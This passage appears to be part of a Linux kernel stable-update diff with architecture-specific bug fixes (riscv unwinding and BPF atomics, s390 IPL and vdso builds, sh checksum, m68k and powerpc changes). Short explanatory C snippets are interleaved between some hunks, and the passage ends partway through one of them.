++++ b/arch/loongarch/kernel/perf_event.c
+@@ -884,4 +884,4 @@ static int __init init_hw_perf_events(void)
+ 
+ 	return 0;
+ }
+-early_initcall(init_hw_perf_events);
++pure_initcall(init_hw_perf_events);
+diff --git a/arch/m68k/kernel/entry.S b/arch/m68k/kernel/entry.S
+index 42879e6eb651d..1219318304b26 100644
+--- a/arch/m68k/kernel/entry.S
++++ b/arch/m68k/kernel/entry.S
+@@ -430,7 +430,9 @@ resume:
+ 	movec	%a0,%dfc
+ 
+ 	/* restore status register */
+-	movew	%a1@(TASK_THREAD+THREAD_SR),%sr
++	movew	%a1@(TASK_THREAD+THREAD_SR),%d0
++	oriw	#0x0700,%d0
++	movew	%d0,%sr
+ 
+ 	rts
+ 
+diff --git a/arch/m68k/mac/misc.c b/arch/m68k/mac/misc.c
+index 4fab347917586..060394b00037d 100644
+--- a/arch/m68k/mac/misc.c
++++ b/arch/m68k/mac/misc.c
+@@ -451,30 +451,18 @@ void mac_poweroff(void)
+ 
+ void mac_reset(void)
+ {
+-	if (macintosh_config->adb_type == MAC_ADB_II &&
+-	    macintosh_config->ident != MAC_MODEL_SE30) {
+-		/* need ROMBASE in booter */
+-		/* indeed, plus need to MAP THE ROM !! */
+-
+-		if (mac_bi_data.rombase == 0)
+-			mac_bi_data.rombase = 0x40800000;
+-
+-		/* works on some */
+-		rom_reset = (void *) (mac_bi_data.rombase + 0xa);
+-
+-		local_irq_disable();
+-		rom_reset();
+ #ifdef CONFIG_ADB_CUDA
+-	} else if (macintosh_config->adb_type == MAC_ADB_EGRET ||
+-	           macintosh_config->adb_type == MAC_ADB_CUDA) {
++	if (macintosh_config->adb_type == MAC_ADB_EGRET ||
++	    macintosh_config->adb_type == MAC_ADB_CUDA) {
+ 		cuda_restart();
++	} else
+ #endif
+ #ifdef CONFIG_ADB_PMU
+-	} else if (macintosh_config->adb_type == MAC_ADB_PB2) {
++	if (macintosh_config->adb_type == MAC_ADB_PB2) {
+ 		pmu_restart();
++	} else
+ #endif
+-	} else if (CPU_IS_030) {
+-
++	if (CPU_IS_030) {
+ 		/* 030-specific reset routine.  The idea is general, but the
+ 		 * specific registers to reset are '030-specific.  Until I
+ 		 * have a non-030 machine, I can't test anything else.
+@@ -522,6 +510,18 @@ void mac_reset(void)
+ 		    "jmp %/a0@\n\t" /* jump to the reset vector */
+ 		    ".chip 68k"
+ 		    : : "r" (offset), "a" (rombase) : "a0");
++	} else {
++		/* need ROMBASE in booter */
++		/* indeed, plus need to MAP THE ROM !! */
++
++		if (mac_bi_data.rombase == 0)
++			mac_bi_data.rombase = 0x40800000;
++
++		/* works on some */
++		rom_reset = (void *)(mac_bi_data.rombase + 0xa);
++
++		local_irq_disable();
++		rom_reset();
+ 	}
+ 
+ 	/* should never get here */
+diff --git a/arch/microblaze/kernel/Makefile b/arch/microblaze/kernel/Makefile
+index 4393bee64eaf8..85c4d29ef43e9 100644
+--- a/arch/microblaze/kernel/Makefile
++++ b/arch/microblaze/kernel/Makefile
+@@ -7,7 +7,6 @@ ifdef CONFIG_FUNCTION_TRACER
+ # Do not trace early boot code and low level code
+ CFLAGS_REMOVE_timer.o = -pg
+ CFLAGS_REMOVE_intc.o = -pg
+-CFLAGS_REMOVE_early_printk.o = -pg
+ CFLAGS_REMOVE_ftrace.o = -pg
+ CFLAGS_REMOVE_process.o = -pg
+ endif
+diff --git a/arch/microblaze/kernel/cpu/cpuinfo-static.c b/arch/microblaze/kernel/cpu/cpuinfo-static.c
+index 85dbda4a08a81..03da36dc6d9c9 100644
+--- a/arch/microblaze/kernel/cpu/cpuinfo-static.c
++++ b/arch/microblaze/kernel/cpu/cpuinfo-static.c
+@@ -18,7 +18,7 @@ static const char family_string[] = CONFIG_XILINX_MICROBLAZE0_FAMILY;
+ static const char cpu_ver_string[] = CONFIG_XILINX_MICROBLAZE0_HW_VER;
+ 
+ #define err_printk(x) \
+-	early_printk("ERROR: Microblaze " x "-different for kernel and DTS\n");
++	pr_err("ERROR: Microblaze " x "-different for kernel and DTS\n");
+ 
+ void __init set_cpuinfo_static(struct cpuinfo *ci, struct device_node *cpu)
+ {
+diff --git a/arch/parisc/kernel/parisc_ksyms.c b/arch/parisc/kernel/parisc_ksyms.c
+index 00297e8e1c888..317508493b81c 100644
+--- a/arch/parisc/kernel/parisc_ksyms.c
++++ b/arch/parisc/kernel/parisc_ksyms.c
+@@ -21,6 +21,7 @@ EXPORT_SYMBOL(memset);
+ #include <linux/atomic.h>
+ EXPORT_SYMBOL(__xchg8);
+ EXPORT_SYMBOL(__xchg32);
++EXPORT_SYMBOL(__cmpxchg_u8);
+ EXPORT_SYMBOL(__cmpxchg_u32);
+ EXPORT_SYMBOL(__cmpxchg_u64);
+ #ifdef CONFIG_SMP
+diff --git a/arch/powerpc/include/asm/hvcall.h b/arch/powerpc/include/asm/hvcall.h
+index 95fd7f9485d55..47bc10cdb70b5 100644
+--- a/arch/powerpc/include/asm/hvcall.h
++++ b/arch/powerpc/include/asm/hvcall.h
+@@ -539,7 +539,7 @@ struct hvcall_mpp_data {
+ 	unsigned long backing_mem;
+ };
+ 
+-int h_get_mpp(struct hvcall_mpp_data *);
++long h_get_mpp(struct hvcall_mpp_data *mpp_data);
+ 
+ struct hvcall_mpp_x_data {
+ 	unsigned long coalesced_bytes;
+diff --git a/arch/powerpc/platforms/pseries/lpar.c b/arch/powerpc/platforms/pseries/lpar.c
+index 5186d65d772e2..29d235b02f062 100644
+--- a/arch/powerpc/platforms/pseries/lpar.c
++++ b/arch/powerpc/platforms/pseries/lpar.c
+@@ -1904,10 +1904,10 @@ notrace void __trace_hcall_exit(long opcode, long retval, unsigned long *retbuf)
+  * h_get_mpp
+  * H_GET_MPP hcall returns info in 7 parms
+  */
+-int h_get_mpp(struct hvcall_mpp_data *mpp_data)
++long h_get_mpp(struct hvcall_mpp_data *mpp_data)
+ {
+-	int rc;
+-	unsigned long retbuf[PLPAR_HCALL9_BUFSIZE];
++	unsigned long retbuf[PLPAR_HCALL9_BUFSIZE] = {0};
++	long rc;
+ 
+ 	rc = plpar_hcall9(H_GET_MPP, retbuf);
+ 
+diff --git a/arch/powerpc/platforms/pseries/lparcfg.c b/arch/powerpc/platforms/pseries/lparcfg.c
+index ca10a3682c46e..a6f2d71831cc1 100644
+--- a/arch/powerpc/platforms/pseries/lparcfg.c
++++ b/arch/powerpc/platforms/pseries/lparcfg.c
+@@ -112,8 +112,8 @@ struct hvcall_ppp_data {
+  */
+ static unsigned int h_get_ppp(struct hvcall_ppp_data *ppp_data)
+ {
+-	unsigned long rc;
+-	unsigned long retbuf[PLPAR_HCALL9_BUFSIZE];
++	unsigned long retbuf[PLPAR_HCALL9_BUFSIZE] = {0};
++	long rc;
+ 
+ 	rc = plpar_hcall9(H_GET_PPP, retbuf);
+ 
+@@ -192,7 +192,7 @@ static void parse_ppp_data(struct seq_file *m)
+ 	struct hvcall_ppp_data ppp_data;
+ 	struct device_node *root;
+ 	const __be32 *perf_level;
+-	int rc;
++	long rc;
+ 
+ 	rc = h_get_ppp(&ppp_data);
+ 	if (rc)
+@@ -393,8 +393,8 @@ static int read_dt_lpar_name(struct seq_file *m)
+ 
+ static void read_lpar_name(struct seq_file *m)
+ {
+-	if (read_rtas_lpar_name(m) && read_dt_lpar_name(m))
+-		pr_err_once("Error can't get the LPAR name");
++	if (read_rtas_lpar_name(m))
++		read_dt_lpar_name(m);
+ }
+ 
+ #define SPLPAR_CHARACTERISTICS_TOKEN 20
+diff --git a/arch/powerpc/sysdev/fsl_msi.c b/arch/powerpc/sysdev/fsl_msi.c
+index 73c2d70706c0a..e50445c2656ac 100644
+--- a/arch/powerpc/sysdev/fsl_msi.c
++++ b/arch/powerpc/sysdev/fsl_msi.c
+@@ -567,10 +567,12 @@ static const struct fsl_msi_feature ipic_msi_feature = {
+ 	.msiir_offset = 0x38,
+ };
+ 
++#ifdef CONFIG_EPAPR_PARAVIRT
+ static const struct fsl_msi_feature vmpic_msi_feature = {
+ 	.fsl_pic_ip = FSL_PIC_IP_VMPIC,
+ 	.msiir_offset = 0,
+ };
++#endif
+ 
+ static const struct of_device_id fsl_of_msi_ids[] = {
+ 	{
+diff --git a/arch/riscv/kernel/cpu_ops_sbi.c b/arch/riscv/kernel/cpu_ops_sbi.c
+index efa0f0816634c..93cbc38d18057 100644
+--- a/arch/riscv/kernel/cpu_ops_sbi.c
++++ b/arch/riscv/kernel/cpu_ops_sbi.c
+@@ -72,7 +72,7 @@ static int sbi_cpu_start(unsigned int cpuid, struct task_struct *tidle)
+ 	/* Make sure tidle is updated */
+ 	smp_mb();
+ 	bdata->task_ptr = tidle;
+-	bdata->stack_ptr = task_stack_page(tidle) + THREAD_SIZE;
++	bdata->stack_ptr = task_pt_regs(tidle);
+ 	/* Make sure boot data is updated */
+ 	smp_mb();
+ 	hsm_data = __pa(bdata);
+diff --git a/arch/riscv/kernel/cpu_ops_spinwait.c b/arch/riscv/kernel/cpu_ops_spinwait.c
+index d98d19226b5f5..691e0c5366d2b 100644
+--- a/arch/riscv/kernel/cpu_ops_spinwait.c
++++ b/arch/riscv/kernel/cpu_ops_spinwait.c
+@@ -34,8 +34,7 @@ static void cpu_update_secondary_bootdata(unsigned int cpuid,
+ 
+ 	/* Make sure tidle is updated */
+ 	smp_mb();
+-	WRITE_ONCE(__cpu_spinwait_stack_pointer[hartid],
+-		   task_stack_page(tidle) + THREAD_SIZE);
++	WRITE_ONCE(__cpu_spinwait_stack_pointer[hartid], task_pt_regs(tidle));
+ 	WRITE_ONCE(__cpu_spinwait_task_pointer[hartid], tidle);
+ }
+ 
+diff --git a/arch/riscv/kernel/entry.S b/arch/riscv/kernel/entry.S
+index 3221a9e5f3724..99d38fdf8b18f 100644
+--- a/arch/riscv/kernel/entry.S
++++ b/arch/riscv/kernel/entry.S
+@@ -248,7 +248,7 @@ ret_from_syscall_rejected:
+ 	andi t0, t0, _TIF_SYSCALL_WORK
+ 	bnez t0, handle_syscall_trace_exit
+ 
+-ret_from_exception:
++SYM_CODE_START_NOALIGN(ret_from_exception)
+ 	REG_L s0, PT_STATUS(sp)
+ 	csrc CSR_STATUS, SR_IE
+ #ifdef CONFIG_TRACE_IRQFLAGS
+@@ -262,6 +262,7 @@ ret_from_exception:
+ 	andi s0, s0, SR_SPP
+ #endif
+ 	bnez s0, resume_kernel
++SYM_CODE_END(ret_from_exception)
+ 
+ 	/* Interrupts must be disabled here so flags are checked atomically */
+ 	REG_L s0, TASK_TI_FLAGS(tp) /* current_thread_info->flags */
+diff --git a/arch/riscv/kernel/stacktrace.c b/arch/riscv/kernel/stacktrace.c
+index 17d7383f201a5..528ec7cc9a622 100644
+--- a/arch/riscv/kernel/stacktrace.c
++++ b/arch/riscv/kernel/stacktrace.c
+@@ -16,6 +16,18 @@
+ 
+ #ifdef CONFIG_FRAME_POINTER
+ 
++extern asmlinkage void ret_from_exception(void);
++
++static inline int fp_is_valid(unsigned long fp, unsigned long sp)
++{
++	unsigned long low, high;
++
++	low = sp + sizeof(struct stackframe);
++	high = ALIGN(sp, THREAD_SIZE);
++
++	return !(fp < low || fp > high || fp & 0x07);
++}
++
+ void notrace walk_stackframe(struct task_struct *task, struct pt_regs *regs,
+ 			     bool (*fn)(void *, unsigned long), void *arg)
+ {
+@@ -39,27 +51,32 @@ void notrace walk_stackframe(struct task_struct *task, struct pt_regs *regs,
+ 	}
+ 
+ 	for (;;) {
+-		unsigned long low, high;
+ 		struct stackframe *frame;
+ 
+ 		if (unlikely(!__kernel_text_address(pc) || (level++ >= 0 && !fn(arg, pc))))
+ 			break;
+ 
+-		/* Validate frame pointer */
+-		low = sp + sizeof(struct stackframe);
+-		high = ALIGN(sp, THREAD_SIZE);
+-		if (unlikely(fp < low || fp > high || fp & 0x7))
++		if (unlikely(!fp_is_valid(fp, sp)))
+ 			break;
++
+ 		/* Unwind stack frame */
+ 		frame = (struct stackframe *)fp - 1;
+ 		sp = fp;
+-		if (regs && (regs->epc == pc) && (frame->fp & 0x7)) {
++		if (regs && (regs->epc == pc) && fp_is_valid(frame->ra, sp)) {
++			/* We hit function where ra is not saved on the stack */
+ 			fp = frame->ra;
+ 			pc = regs->ra;
+ 		} else {
+ 			fp = frame->fp;
+ 			pc = ftrace_graph_ret_addr(current, NULL, frame->ra,
+ 						   &frame->ra);
++			if (pc == (unsigned long)ret_from_exception) {
++				if (unlikely(!__kernel_text_address(pc) || !fn(arg, pc)))
++					break;
++
++				pc = ((struct pt_regs *)sp)->epc;
++				fp = ((struct pt_regs *)sp)->s0;
++			}
+ 		}
+ 
+ 	}
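The fp_is_valid() helper introduced above is a conventional frame-pointer sanity check: the saved fp must land between the current stack pointer (plus room for one frame record) and the top of the current stack, and must be 8-byte aligned. A compilable userspace rendering of the same predicate (the THREAD_SIZE value is illustrative; it is arch-specific in the kernel):

    #define THREAD_SIZE 16384UL  /* illustrative; arch-specific in the kernel */

    struct stackframe {
            unsigned long fp;
            unsigned long ra;
    };

    #define ALIGN_UP(x, a) (((x) + (a) - 1) & ~((a) - 1))

    /* fp must lie within [sp + one frame record, stack top], 8-byte aligned. */
    static int fp_is_valid(unsigned long fp, unsigned long sp)
    {
            unsigned long low  = sp + sizeof(struct stackframe);
            unsigned long high = ALIGN_UP(sp, THREAD_SIZE);

            return !(fp < low || fp > high || (fp & 0x07));
    }

    int main(void)
    {
            unsigned long sp = 0x4010;           /* somewhere inside a stack */
            return !fp_is_valid(sp + 0x30, sp);  /* exits 0: fp is plausible */
    }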
+diff --git a/arch/riscv/net/bpf_jit_comp64.c b/arch/riscv/net/bpf_jit_comp64.c
+index 8f5d3c57d58ad..4c4ac563326b5 100644
+--- a/arch/riscv/net/bpf_jit_comp64.c
++++ b/arch/riscv/net/bpf_jit_comp64.c
+@@ -503,33 +503,33 @@ static void emit_atomic(u8 rd, u8 rs, s16 off, s32 imm, bool is64,
+ 		break;
+ 	/* src_reg = atomic_fetch_<op>(dst_reg + off16, src_reg) */
+ 	case BPF_ADD | BPF_FETCH:
+-		emit(is64 ? rv_amoadd_d(rs, rs, rd, 0, 0) :
+-		     rv_amoadd_w(rs, rs, rd, 0, 0), ctx);
++		emit(is64 ? rv_amoadd_d(rs, rs, rd, 1, 1) :
++		     rv_amoadd_w(rs, rs, rd, 1, 1), ctx);
+ 		if (!is64)
+ 			emit_zext_32(rs, ctx);
+ 		break;
+ 	case BPF_AND | BPF_FETCH:
+-		emit(is64 ? rv_amoand_d(rs, rs, rd, 0, 0) :
+-		     rv_amoand_w(rs, rs, rd, 0, 0), ctx);
++		emit(is64 ? rv_amoand_d(rs, rs, rd, 1, 1) :
++		     rv_amoand_w(rs, rs, rd, 1, 1), ctx);
+ 		if (!is64)
+ 			emit_zext_32(rs, ctx);
+ 		break;
+ 	case BPF_OR | BPF_FETCH:
+-		emit(is64 ? rv_amoor_d(rs, rs, rd, 0, 0) :
+-		     rv_amoor_w(rs, rs, rd, 0, 0), ctx);
++		emit(is64 ? rv_amoor_d(rs, rs, rd, 1, 1) :
++		     rv_amoor_w(rs, rs, rd, 1, 1), ctx);
+ 		if (!is64)
+ 			emit_zext_32(rs, ctx);
+ 		break;
+ 	case BPF_XOR | BPF_FETCH:
+-		emit(is64 ? rv_amoxor_d(rs, rs, rd, 0, 0) :
+-		     rv_amoxor_w(rs, rs, rd, 0, 0), ctx);
++		emit(is64 ? rv_amoxor_d(rs, rs, rd, 1, 1) :
++		     rv_amoxor_w(rs, rs, rd, 1, 1), ctx);
+ 		if (!is64)
+ 			emit_zext_32(rs, ctx);
+ 		break;
+ 	/* src_reg = atomic_xchg(dst_reg + off16, src_reg); */
+ 	case BPF_XCHG:
+-		emit(is64 ? rv_amoswap_d(rs, rs, rd, 0, 0) :
+-		     rv_amoswap_w(rs, rs, rd, 0, 0), ctx);
++		emit(is64 ? rv_amoswap_d(rs, rs, rd, 1, 1) :
++		     rv_amoswap_w(rs, rs, rd, 1, 1), ctx);
+ 		if (!is64)
+ 			emit_zext_32(rs, ctx);
+ 		break;
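Flipping the aq and rl bits to 1 makes these RISC-V AMOs fully ordered, which is the ordering BPF expects from fetch-and-op and exchange atomics. The portable-C equivalent of what the JIT now emits is a sequentially consistent atomic, e.g. (a small standalone illustration, not JIT code):

    #include <stdatomic.h>
    #include <stdio.h>

    int main(void)
    {
            atomic_long v = 40;

            /*
             * On RISC-V a seq_cst fetch-add typically compiles to
             * amoadd.d.aqrl, i.e. aq=1, rl=1 as in the fixed JIT.
             */
            long old = atomic_fetch_add_explicit(&v, 2, memory_order_seq_cst);

            printf("old=%ld new=%ld\n", old, atomic_load(&v));
            return 0;
    }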
+diff --git a/arch/s390/boot/startup.c b/arch/s390/boot/startup.c
+index e0863d28759a5..bfb4dec36414a 100644
+--- a/arch/s390/boot/startup.c
++++ b/arch/s390/boot/startup.c
+@@ -30,7 +30,6 @@ int __bootdata(is_full_image) = 1;
+ struct initrd_data __bootdata(initrd_data);
+ 
+ u64 __bootdata_preserved(stfle_fac_list[16]);
+-u64 __bootdata_preserved(alt_stfle_fac_list[16]);
+ struct oldmem_data __bootdata_preserved(oldmem_data);
+ 
+ void error(char *x)
+diff --git a/arch/s390/kernel/ipl.c b/arch/s390/kernel/ipl.c
+index df5d2ec737d80..3aa3fff9bde0c 100644
+--- a/arch/s390/kernel/ipl.c
++++ b/arch/s390/kernel/ipl.c
+@@ -834,8 +834,8 @@ static ssize_t reipl_nvme_scpdata_write(struct file *filp, struct kobject *kobj,
+ 		scpdata_len += padding;
+ 	}
+ 
+-	reipl_block_nvme->hdr.len = IPL_BP_FCP_LEN + scpdata_len;
+-	reipl_block_nvme->nvme.len = IPL_BP0_FCP_LEN + scpdata_len;
++	reipl_block_nvme->hdr.len = IPL_BP_NVME_LEN + scpdata_len;
++	reipl_block_nvme->nvme.len = IPL_BP0_NVME_LEN + scpdata_len;
+ 	reipl_block_nvme->nvme.scp_data_len = scpdata_len;
+ 
+ 	return count;
+@@ -1604,9 +1604,9 @@ static int __init dump_nvme_init(void)
+ 	}
+ 	dump_block_nvme->hdr.len = IPL_BP_NVME_LEN;
+ 	dump_block_nvme->hdr.version = IPL_PARM_BLOCK_VERSION;
+-	dump_block_nvme->fcp.len = IPL_BP0_NVME_LEN;
+-	dump_block_nvme->fcp.pbt = IPL_PBT_NVME;
+-	dump_block_nvme->fcp.opt = IPL_PB0_NVME_OPT_DUMP;
++	dump_block_nvme->nvme.len = IPL_BP0_NVME_LEN;
++	dump_block_nvme->nvme.pbt = IPL_PBT_NVME;
++	dump_block_nvme->nvme.opt = IPL_PB0_NVME_OPT_DUMP;
+ 	dump_capabilities |= DUMP_TYPE_NVME;
+ 	return 0;
+ }
+diff --git a/arch/s390/kernel/setup.c b/arch/s390/kernel/setup.c
+index 2ec5f1e0312fa..1f514557fee9d 100644
+--- a/arch/s390/kernel/setup.c
++++ b/arch/s390/kernel/setup.c
+@@ -155,7 +155,7 @@ unsigned int __bootdata_preserved(zlib_dfltcc_support);
+ EXPORT_SYMBOL(zlib_dfltcc_support);
+ u64 __bootdata_preserved(stfle_fac_list[16]);
+ EXPORT_SYMBOL(stfle_fac_list);
+-u64 __bootdata_preserved(alt_stfle_fac_list[16]);
++u64 alt_stfle_fac_list[16];
+ struct oldmem_data __bootdata_preserved(oldmem_data);
+ 
+ unsigned long VMALLOC_START;
+diff --git a/arch/s390/kernel/vdso32/Makefile b/arch/s390/kernel/vdso32/Makefile
+index cc513add48eb5..6056f2ae02632 100644
+--- a/arch/s390/kernel/vdso32/Makefile
++++ b/arch/s390/kernel/vdso32/Makefile
+@@ -20,7 +20,10 @@ KBUILD_AFLAGS_32 := $(filter-out -m64,$(KBUILD_AFLAGS))
+ KBUILD_AFLAGS_32 += -m31 -s
+ 
+ KBUILD_CFLAGS_32 := $(filter-out -m64,$(KBUILD_CFLAGS))
+-KBUILD_CFLAGS_32 += -m31 -fPIC -shared -fno-common -fno-builtin
++KBUILD_CFLAGS_32 := $(filter-out -mpacked-stack,$(KBUILD_CFLAGS))
++KBUILD_CFLAGS_32 := $(filter-out -mno-pic-data-is-text-relative,$(KBUILD_CFLAGS_32))
++KBUILD_CFLAGS_32 := $(filter-out -fno-asynchronous-unwind-tables,$(KBUILD_CFLAGS_32))
++KBUILD_CFLAGS_32 += -m31 -fPIC -shared -fno-common -fno-builtin -fasynchronous-unwind-tables
+ 
+ LDFLAGS_vdso32.so.dbg += -shared -soname=linux-vdso32.so.1 \
+ 	--hash-style=both --build-id=sha1 -melf_s390 -T
+diff --git a/arch/s390/kernel/vdso64/Makefile b/arch/s390/kernel/vdso64/Makefile
+index 42d918d50a1ff..498d56757c4dc 100644
+--- a/arch/s390/kernel/vdso64/Makefile
++++ b/arch/s390/kernel/vdso64/Makefile
+@@ -25,7 +25,11 @@ KBUILD_AFLAGS_64 := $(filter-out -m64,$(KBUILD_AFLAGS))
+ KBUILD_AFLAGS_64 += -m64 -s
+ 
+ KBUILD_CFLAGS_64 := $(filter-out -m64,$(KBUILD_CFLAGS))
+-KBUILD_CFLAGS_64 += -m64 -fPIC -fno-common -fno-builtin
++KBUILD_CFLAGS_64 := $(filter-out -mpacked-stack,$(KBUILD_CFLAGS_64))
++KBUILD_CFLAGS_64 := $(filter-out -mno-pic-data-is-text-relative,$(KBUILD_CFLAGS_64))
++KBUILD_CFLAGS_64 := $(filter-out -munaligned-symbols,$(KBUILD_CFLAGS_64))
++KBUILD_CFLAGS_64 := $(filter-out -fno-asynchronous-unwind-tables,$(KBUILD_CFLAGS_64))
++KBUILD_CFLAGS_64 += -m64 -fPIC -fno-common -fno-builtin -fasynchronous-unwind-tables
+ ldflags-y := -shared -soname=linux-vdso64.so.1 \
+ 	     --hash-style=both --build-id=sha1 -T
+ 
+diff --git a/arch/s390/net/bpf_jit_comp.c b/arch/s390/net/bpf_jit_comp.c
+index fbdba4c306bea..8623863935576 100644
+--- a/arch/s390/net/bpf_jit_comp.c
++++ b/arch/s390/net/bpf_jit_comp.c
+@@ -1207,8 +1207,12 @@ static noinline int bpf_jit_insn(struct bpf_jit *jit, struct bpf_prog *fp,
+ 	EMIT6_DISP_LH(0xeb000000, is32 ? (op32) : (op64),		\
+ 		      (insn->imm & BPF_FETCH) ? src_reg : REG_W0,	\
+ 		      src_reg, dst_reg, off);				\
+-	if (is32 && (insn->imm & BPF_FETCH))				\
+-		EMIT_ZERO(src_reg);					\
++	if (insn->imm & BPF_FETCH) {					\
++		/* bcr 14,0 - see atomic_fetch_{add,and,or,xor}() */	\
++		_EMIT2(0x07e0);						\
++		if (is32)                                               \
++			EMIT_ZERO(src_reg);				\
++	}								\
+ } while (0)
+ 		case BPF_ADD:
+ 		case BPF_ADD | BPF_FETCH:
+diff --git a/arch/sh/kernel/kprobes.c b/arch/sh/kernel/kprobes.c
+index aed1ea8e2c2f0..74051b8ddf3e7 100644
+--- a/arch/sh/kernel/kprobes.c
++++ b/arch/sh/kernel/kprobes.c
+@@ -44,17 +44,12 @@ int __kprobes arch_prepare_kprobe(struct kprobe *p)
+ 	if (OPCODE_RTE(opcode))
+ 		return -EFAULT;	/* Bad breakpoint */
+ 
++	memcpy(p->ainsn.insn, p->addr, MAX_INSN_SIZE * sizeof(kprobe_opcode_t));
+ 	p->opcode = opcode;
+ 
+ 	return 0;
+ }
+ 
+-void __kprobes arch_copy_kprobe(struct kprobe *p)
+-{
+-	memcpy(p->ainsn.insn, p->addr, MAX_INSN_SIZE * sizeof(kprobe_opcode_t));
+-	p->opcode = *p->addr;
+-}
+-
+ void __kprobes arch_arm_kprobe(struct kprobe *p)
+ {
+ 	*p->addr = BREAKPOINT_INSTRUCTION;
+diff --git a/arch/sh/lib/checksum.S b/arch/sh/lib/checksum.S
+index 3e07074e00981..06fed5a21e8ba 100644
+--- a/arch/sh/lib/checksum.S
++++ b/arch/sh/lib/checksum.S
+@@ -33,7 +33,8 @@
+  */
+ 
+ /*	
+- * asmlinkage __wsum csum_partial(const void *buf, int len, __wsum sum);
++ * unsigned int csum_partial(const unsigned char *buf, int len,
++ *                           unsigned int sum);
+  */
+ 
+ .text
+@@ -45,31 +46,11 @@ ENTRY(csum_partial)
+ 	   * Fortunately, it is easy to convert 2-byte alignment to 4-byte
+ 	   * alignment for the unrolled loop.
+ 	   */
++	mov	r5, r1
+ 	mov	r4, r0
+-	tst	#3, r0		! Check alignment.
+-	bt/s	2f		! Jump if alignment is ok.
+-	 mov	r4, r7		! Keep a copy to check for alignment
++	tst	#2, r0		! Check alignment.
++	bt	2f		! Jump if alignment is ok.
+ 	!
+-	tst	#1, r0		! Check alignment.
+-	bt	21f		! Jump if alignment is boundary of 2bytes.
+-
+-	! buf is odd
+-	tst	r5, r5
+-	add	#-1, r5
+-	bt	9f
+-	mov.b	@r4+, r0
+-	extu.b	r0, r0
+-	addc	r0, r6		! t=0 from previous tst
+-	mov	r6, r0
+-	shll8	r6
+-	shlr16	r0
+-	shlr8	r0
+-	or	r0, r6
+-	mov	r4, r0
+-	tst	#2, r0
+-	bt	2f
+-21:
+-	! buf is 2 byte aligned (len could be 0)
+ 	add	#-2, r5		! Alignment uses up two bytes.
+ 	cmp/pz	r5		!
+ 	bt/s	1f		! Jump if we had at least two bytes.
+@@ -77,17 +58,16 @@ ENTRY(csum_partial)
+ 	bra	6f
+ 	 add	#2, r5		! r5 was < 2.  Deal with it.
+ 1:
++	mov	r5, r1		! Save new len for later use.
+ 	mov.w	@r4+, r0
+ 	extu.w	r0, r0
+ 	addc	r0, r6
+ 	bf	2f
+ 	add	#1, r6
+ 2:
+-	! buf is 4 byte aligned (len could be 0)
+-	mov	r5, r1
+ 	mov	#-5, r0
+-	shld	r0, r1
+-	tst	r1, r1
++	shld	r0, r5
++	tst	r5, r5
+ 	bt/s	4f		! if it's =0, go to 4f
+ 	 clrt
+ 	.align	2
+@@ -109,31 +89,30 @@ ENTRY(csum_partial)
+ 	addc	r0, r6
+ 	addc	r2, r6
+ 	movt	r0
+-	dt	r1
++	dt	r5
+ 	bf/s	3b
+ 	 cmp/eq	#1, r0
+-	! here, we know r1==0
+-	addc	r1, r6			! add carry to r6
++	! here, we know r5==0
++	addc	r5, r6			! add carry to r6
+ 4:
+-	mov	r5, r0
++	mov	r1, r0
+ 	and	#0x1c, r0
+ 	tst	r0, r0
+-	bt	6f
+-	! 4 bytes or more remaining
+-	mov	r0, r1
+-	shlr2	r1
++	bt/s	6f
++	 mov	r0, r5
++	shlr2	r5
+ 	mov	#0, r2
+ 5:
+ 	addc	r2, r6
+ 	mov.l	@r4+, r2
+ 	movt	r0
+-	dt	r1
++	dt	r5
+ 	bf/s	5b
+ 	 cmp/eq	#1, r0
+ 	addc	r2, r6
+-	addc	r1, r6		! r1==0 here, so it means add carry-bit
++	addc	r5, r6		! r5==0 here, so it means add carry-bit
+ 6:
+-	! 3 bytes or less remaining
++	mov	r1, r5
+ 	mov	#3, r0
+ 	and	r0, r5
+ 	tst	r5, r5
+@@ -159,16 +138,6 @@ ENTRY(csum_partial)
+ 	mov	#0, r0
+ 	addc	r0, r6
+ 9:
+-	! Check if the buffer was misaligned, if so realign sum
+-	mov	r7, r0
+-	tst	#1, r0
+-	bt	10f
+-	mov	r6, r0
+-	shll8	r6
+-	shlr16	r0
+-	shlr8	r0
+-	or	r0, r6
+-10:
+ 	rts
+ 	 mov	r6, r0
+ 
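For reference, the operation this assembly computes is the Internet ones'-complement partial checksum. A plain-C model of the same function (byte-at-a-time and little-endian like SH, with the final carry fold shown explicitly; not performance-tuned like the assembly):

    #include <stddef.h>
    #include <stdint.h>
    #include <stdio.h>

    static uint32_t csum_partial(const unsigned char *buf, size_t len,
                                 uint32_t sum)
    {
            size_t i;

            /* Accumulate 16-bit little-endian words. */
            for (i = 0; i + 1 < len; i += 2)
                    sum += (uint32_t)buf[i] | ((uint32_t)buf[i + 1] << 8);
            if (len & 1)
                    sum += buf[len - 1];    /* trailing odd byte */

            while (sum >> 16)               /* fold carries back in */
                    sum = (sum & 0xffff) + (sum >> 16);
            return sum;
    }

    int main(void)
    {
            unsigned char data[] = { 0x45, 0x00, 0x00, 0x54 };

            printf("csum = 0x%04x\n",
                   (unsigned)csum_partial(data, sizeof(data), 0));
            return 0;
    }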
+diff --git a/arch/um/drivers/line.c b/arch/um/drivers/line.c
+index 02b0befd67632..95ad6b190d1d1 100644
+--- a/arch/um/drivers/line.c
++++ b/arch/um/drivers/line.c
+@@ -673,24 +673,26 @@ void register_winch_irq(int fd, int tty_fd, int pid, struct tty_port *port,
+ 		goto cleanup;
+ 	}
+ 
+-	*winch = ((struct winch) { .list  	= LIST_HEAD_INIT(winch->list),
+-				   .fd  	= fd,
++	*winch = ((struct winch) { .fd  	= fd,
+ 				   .tty_fd 	= tty_fd,
+ 				   .pid  	= pid,
+ 				   .port 	= port,
+ 				   .stack	= stack });
+ 
++	spin_lock(&winch_handler_lock);
++	list_add(&winch->list, &winch_handlers);
++	spin_unlock(&winch_handler_lock);
++
+ 	if (um_request_irq(WINCH_IRQ, fd, IRQ_READ, winch_interrupt,
+ 			   IRQF_SHARED, "winch", winch) < 0) {
+ 		printk(KERN_ERR "register_winch_irq - failed to register "
+ 		       "IRQ\n");
++		spin_lock(&winch_handler_lock);
++		list_del(&winch->list);
++		spin_unlock(&winch_handler_lock);
+ 		goto out_free;
+ 	}
+ 
+-	spin_lock(&winch_handler_lock);
+-	list_add(&winch->list, &winch_handlers);
+-	spin_unlock(&winch_handler_lock);
+-
+ 	return;
+ 
+  out_free:
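The reordering in this hunk follows a general rule for handler registration: publish the bookkeeping before enabling the event source (the IRQ may fire immediately once requested), and unpublish on failure. A small pthread-based sketch of the same discipline (all names invented for illustration):

    #include <pthread.h>
    #include <stdlib.h>

    struct handler {
            struct handler *next;
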